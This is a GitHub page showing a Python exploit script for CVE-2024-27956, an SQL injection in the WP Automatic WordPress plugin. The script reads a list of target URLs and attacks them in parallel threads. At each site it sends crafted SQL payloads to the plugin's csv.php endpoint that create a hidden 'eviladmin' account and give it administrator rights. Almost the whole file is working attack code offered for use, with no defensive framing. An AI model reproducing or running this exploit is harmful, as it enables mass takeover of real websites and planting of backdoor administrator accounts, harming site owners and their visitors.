-
Notifications
You must be signed in to change notification settings - Fork 0
/
Exploitation part.py
138 lines (112 loc) · 8.25 KB
/
Exploitation part.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
import argparse
import requests
import sys
import urllib3
import os
from sys import stdout
from colorama import Fore, init
from concurrent.futures import ThreadPoolExecutor, as_completed
# Disable insecure request warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Initialize colorama
init(autoreset=True)
def clear():
os.system('clear' if os.name == 'posix' else 'cls')
def banners():
clear()
stdout.write(" \n")
stdout.write(""+Fore.LIGHTRED_EX +" ██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██╗ ██╗ ██████╗ ███████╗ █████╗ ███████╗ ██████╗ \n")
stdout.write(""+Fore.LIGHTRED_EX +"██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗██║ ██║ ╚════██╗╚════██║██╔══██╗██╔════╝██╔════╝ \n")
stdout.write(""+Fore.LIGHTRED_EX +"██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝███████║█████╗ █████╔╝ ██╔╝╚██████║███████╗███████╗ \n")
stdout.write(""+Fore.LIGHTRED_EX +"██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚════██║╚════╝██╔═══╝ ██╔╝ ╚═══██║╚════██║██╔═══██╗\n")
stdout.write(""+Fore.LIGHTRED_EX +"╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗ ██║ ███████╗ ██║ █████╔╝███████║╚██████╔╝\n")
stdout.write(""+Fore.LIGHTRED_EX +" ╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚══════╝ ╚═╝ ╚════╝ ╚══════╝ ╚═════╝ \n")
stdout.write(""+Fore.YELLOW +"═════════════╦═════════════════════════════════╦══════════════════════════════\n")
stdout.write(""+Fore.YELLOW +"╔════════════╩═════════════════════════════════╩═════════════════════════════╗\n")
stdout.write(""+Fore.YELLOW +"║ \x1b[38;2;255;20;147m• "+Fore.GREEN+"AUTHOR "+Fore.RED+" |"+Fore.LIGHTWHITE_EX+" PARI MALAM "+Fore.YELLOW+"║\n")
stdout.write(""+Fore.YELLOW +"╔════════════════════════════════════════════════════════════════════════════╝\n")
stdout.write(""+Fore.YELLOW +"║ \x1b[38;2;255;20;147m• "+Fore.GREEN+"GITHUB "+Fore.RED+" |"+Fore.LIGHTWHITE_EX+" "+Fore.YELLOW+"║\n")
stdout.write(""+Fore.YELLOW +"╚════════════════════════════════════════════════════════════════════════════╝\n")
print(f"{Fore.YELLOW}[CVE-2024-27956] - {Fore.GREEN}Wordpress SQLI-2-RCE\n")
def makeRequest(payload, hash, url):
session = requests.Session()
session.verify = False
headers = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate, br',
'Content-type': 'application/x-www-form-urlencoded',
'Connection': 'close',
'Upgrade-Insecure-Requests': '1'
}
data = {
'q': payload,
'auth': b'\0',
'integ': hash
}
try:
response = session.post(url, data=data, headers=headers)
response.raise_for_status()
return response
except requests.exceptions.RequestException as e:
print(f"{Fore.YELLOW}[SQLI-2-RCE]: {Fore.WHITE}{url} {Fore.RED}- Failed: {e}{Fore.RESET}")
return None
def helpUsage():
print("[+] You must run the exploit passing the Wordpress URL.")
print("[+] Example: python exploit.py -f urls.txt")
sys.exit(1)
def verifyArgs():
parser = argparse.ArgumentParser(description="Exploit for CVE-2024-27956")
parser.add_argument('-f', '--file', type=str, required=True, help='File containing URLs/IPs, one per line')
parser.add_argument('-t', '--threads', type=int, default=5, help='Number of threads to use for concurrent requests (default: 5)')
args = parser.parse_args()
try:
with open(args.file, 'r') as f:
urls = f.read().strip().splitlines()
except FileNotFoundError as e:
print(f"File '{args.file}' not found: {e}")
sys.exit(1)
except Exception as e:
print(f"Error reading file '{args.file}': {e}")
sys.exit(1)
# Ensure URLs have http:// or https:// prefix
urls = [url if url.startswith('http://') or url.startswith('https://') else f'http://{url}' for url in urls]
return urls, args.threads
def exploitWordpress(url):
exploit_path = '/wp-content/plugins/wp-automatic/inc/csv.php'
print(f"{Fore.YELLOW}[SQLI-2-RCE]: {Fore.WHITE}{url} {Fore.GREEN}- Attempting to exploit{Fore.RESET}")
# Construct SQL query with dynamic URL
create_user_payload = f"INSERT INTO wp_users (user_login, user_pass, user_nicename, user_email, user_url, user_registered, user_status, display_name) VALUES ('eviladmin', '$P$BASbMqW0nlZRux/2IhCw7AdvoNI4VT0', 'eviladmin', 'eviladmin@gmail.com', '{url}', '2024-04-30 16:26:43', 0, 'eviladmin')"
create_user_hash = "09956ea086b172d6cf8ac31de406c4c0"
response = makeRequest(create_user_payload, create_user_hash, url + exploit_path)
if response is None:
return False
if "Tampered query" in response.text or "invalid login" in response.text or "login required" in response.text:
print(f"{Fore.YELLOW}[SQLI-2-RCE]: {Fore.WHITE}{url} {Fore.RED}- Payload Error: {response.text.strip()}{Fore.RESET}")
return False
if "DATE" not in response.text:
print(f"{Fore.YELLOW}[SQLI-2-RCE]: {Fore.WHITE}{url} {Fore.RED}- Not Vulnerable{Fore.RESET}")
return False
# Second request (give admin permissions)
give_permission_payload = "INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES ((SELECT ID FROM wp_users WHERE user_login = 'eviladmin'), 'wp_capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}')"
give_permission_hash = "bd98494b41544b818fa9f583dadfa2bb"
response = makeRequest(give_permission_payload, give_permission_hash, url + exploit_path)
if response is None:
return False
if "Tampered query" in response.text or "invalid login" in response.text or "login required" in response.text:
print(f"{Fore.YELLOW}[SQLI-2-RCE]: {Fore.WHITE}{url} {Fore.RED}- Payload Error: {response.text.strip()}{Fore.RESET}")
return False
print(f"{Fore.YELLOW}[SQLI-2-RCE]: {Fore.WHITE}{url} {Fore.GREEN}Exploit completed successfully: eviladmin:admin{Fore.RESET}")
return True
def main():
urls, threads = verifyArgs()
with ThreadPoolExecutor(max_workers=threads) as executor:
futures = []
for url in urls:
futures.append(executor.submit(exploitWordpress, url))
for future in as_completed(futures):
future.result()
if name == "main":
banners()
main()